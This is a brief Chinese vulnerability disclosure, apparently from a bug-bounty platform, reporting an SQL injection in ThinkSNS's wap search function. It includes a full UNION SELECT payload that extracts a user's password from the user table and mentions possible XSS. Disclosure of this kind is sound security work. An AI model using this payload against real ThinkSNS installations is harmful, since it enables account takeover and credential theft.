ThinkSNS再来一枚sql注入漏洞

简要描述： 还是为了答谢你们送的水杯。 严重的sql注入 可爆任意密码 你懂的！ xss那就不用说了 详细说明： wap模块的搜索没有对关键字过滤 知道表名即可估计 好在我不知道官网的表名。只有本地测试了 漏洞证明： http://========/index.php?app=wap&mod=Index&act=doSearch 关键字输入 1' and 1=2 union select 1,2,3,password,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20 from cqquser where uid=1 and 1='1...